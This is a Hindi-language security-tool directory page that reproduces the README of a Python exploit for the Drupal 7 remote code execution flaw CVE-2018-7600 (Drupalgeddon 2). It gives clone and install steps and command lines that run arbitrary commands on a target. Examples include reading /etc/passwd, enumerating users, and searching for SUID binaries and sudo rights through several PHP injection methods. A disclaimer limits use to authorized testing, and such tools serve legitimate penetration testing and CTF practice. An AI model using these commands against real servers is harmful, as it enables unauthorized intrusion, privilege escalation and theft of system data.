Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Drupalgeddon2-CVE-2018-7600 — CVE-2018-7600 (Drupalgeddon 2) के लिए Python शोषण जो Drupal 7 पर दूरस्थ कोड निष्पादन सक्षम करता है, कई इंजेक्शन विधियों और Linux और Windows के लिए पूर्वनिर्धारित कमांड के साथ। | Kitploit
उपकरण/GitHubGitHub/bixipro/drupalgeddon2-cve-2018-7600
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षा
GitHubbixipro/drupalgeddon2-cve-2018-7600

Drupalgeddon2-CVE-2018-7600

CVE-2018-7600 (Drupalgeddon 2) के लिए Python शोषण जो Drupal 7 पर दूरस्थ कोड निष्पादन सक्षम करता है, कई इंजेक्शन विधियों और Linux और Windows के लिए पूर्वनिर्धारित कमांड के साथ।

रिपॉजिटरी देखें
7 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔥 Drupalgeddon 2 Exploit — bixi.py

📖 विवरण

bixi.py एक शोषण है जो CVE‑2018‑7600 (Drupalgeddon 2) कमजोरी के लिए है जो Drupal 7 को प्रभावित करता है। यह एक सहज इंटरफ़ेस और पूर्वनिर्धारित आदेशों के माध्यम से कमजोर Drupal सर्वरों पर रिमोट कमांड निष्पादन (RCE) की अनुमति देता है।


⚠️ अस्वीकरण / कानूनी सूचना

यह सॉफ्टवेयर केवल नियंत्रित वातावरण में शैक्षिक और अनुसंधान उद्देश्यों के लिए है।

  • केवल उन प्रणालियों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति है
  • अनधिकृत उपयोग अवैध है और इसके परिणामस्वरूप आपराधिक दंड हो सकता है
  • लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है
  • हमेशा स्थानीय और अंतरराष्ट्रीय साइबर सुरक्षा कानूनों का पालन करें

"With great power comes great responsibility"


📋 विशेषताएँ

  • ✅ CVE‑2018‑7600 का स्वचालित शोषण
  • ✅ Linux और Windows के लिए पूर्वनिर्धारित आदेश
  • ✅ एकाधिक इंजेक्शन विधियाँ (system, , , )
passthru
exec
shell_exec
  • ✅ सहायता प्रणाली के साथ सहज इंटरफ़ेस
  • ✅ मजबूत त्रुटि प्रबंधन और समय-सीमा
  • ✅ स्वरूपित और पढ़ने में आसान आउटपुट

  • 🚀 त्वरित स्थापना

    1. रिपॉजिटरी क्लोन करें

    root@kitploit:~
    git clone https://github.com/bixiPRO/Drupalgeddon2-CVE-2018-7600.git
    cd Drupalgeddon2-CVE-2018-7600
    

    2. निर्भरताएँ स्थापित करें

    root@kitploit:~
    # Kali / Debian / Ubuntu
    sudo apt update
    sudo apt install python3 python3-pip -y
    pip3 install requests
    
    # अन्य वितरण
    pip3 install requests
    

    3. निष्पादन अनुमति दें

    root@kitploit:~
    chmod +x bixi.py
    

    🎯 मूल उपयोग

    पूर्ण सहायता देखें

    root@kitploit:~
    python3 bixi.py --help
    

    सामान्य वाक्यविन्यास

    root@kitploit:~
    python3 bixi.py <URL> <COMANDO/PALABRA_CLAVE> [INJECTION_TYPE]
    

    व्यावहारिक उदाहरण

    root@kitploit:~
    # भेद्यता जांचें
    python3 bixi.py http://10.99.99.6/drupal/ test
    
    # ऑपरेटिंग सिस्टम का पता लगाएं
    python3 bixi.py http://10.99.99.6/drupal/ linux
    python3 bixi.py http://10.99.99.6/drupal/ windows
    
    # उपयोगकर्ताओं की गणना करें
    python3 bixi.py http://10.99.99.6/drupal/ users_linux
    python3 bixi.py http://10.99.99.6/drupal/ net_user
    
    # सिस्टम जानकारी
    python3 bixi.py http://10.99.99.6/drupal/ ifconfig
    python3 bixi.py http://10.99.99.6/drupal/ ipconfig
    
    # अनुकूलित आदेश
    python3 bixi.py http://10.99.99.6/drupal/ "cat /etc/passwd"
    python3 bixi.py http://10.99.99.6/drupal/ "whoami /all"
    

    📊 पूर्वनिर्धारित कीवर्ड

    🐧 Linux

    आदेशविवरण
    linuxसिस्टम जानकारी
    users_linuxउपयोगकर्ताओं की सूची बनाएं
    idउपयोगकर्ता/समूह जानकारी
    lsफ़ाइलों की सूची बनाएं
    ifconfigनेटवर्क जानकारी
    find_flagझंडे खोजें

    🪟 Windows

    आदेशविवरण
    windowsसिस्टम जानकारी
    net_userउपयोगकर्ताओं की सूची बनाएं
    whoami_winविस्तृत जानकारी
    ipconfigनेटवर्क
    netstat_winकनेक्शन
    dirनिर्देशिका सूची बनाएं

    🔧 Pentesting

    आदेशविवरण
    sudosudo विशेषाधिकार जांचें
    suidSUID बाइनरी खोजें
    net_localgroupस्थानीय समूह
    drupal_configकॉन्फ़िगरेशन खोजें
    drupal_versionDrupal संस्करण प्राप्त करें

    🎨 इंजेक्शन विधियाँ

    root@kitploit:~
    # system (डिफ़ॉल्ट)
    python3 bixi.py http://target/ "whoami" system
    
    # passthru
    python3 bixi.py http://target/ "whoami" passthru
    
    # exec
    python3 bixi.py http://target/ "whoami" exec
    
    # shell_exec
    python3 bixi.py http://target/ "whoami" shell_exec
    

    🏗️ परियोजना संरचना

    root@kitploit:~
    drupalgeddon2-exploit/
    │
    ├── bixi.py
    ├── README.md
    ├── requirements.txt
    ├── examples/
    │   ├── linux_commands.txt
    │   └── windows_commands.txt
    └── screenshots/
        ├── help_screen.png
        └── exploit_success.png
    

    🔧 उन्नत कॉन्फ़िगरेशन

    प्रॉक्सी (वैकल्पिक)

    root@kitploit:~
    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }
    

    टाइमआउट

    डिफ़ॉल्ट मान बदलें (15 सेकंड):

    root@kitploit:~
    timeout=15
    

    नए आदेश जोड़ें

    get_command_for_keyword() में commands शब्दकोश संपादित करें


    🐛 समस्या समाधान

    त्रुटि: 'requests' नाम का कोई मॉड्यूल नहीं

    root@kitploit:~
    pip3 install requests
    

    त्रुटि: कनेक्शन अस्वीकृत

    root@kitploit:~
    # कनेक्टिविटी जांचें
    ping TARGET_IP
    
    # Drupal पथ जांचें
    curl http://TARGET_IP/drupal/
    
    टूल डाउनलोड करें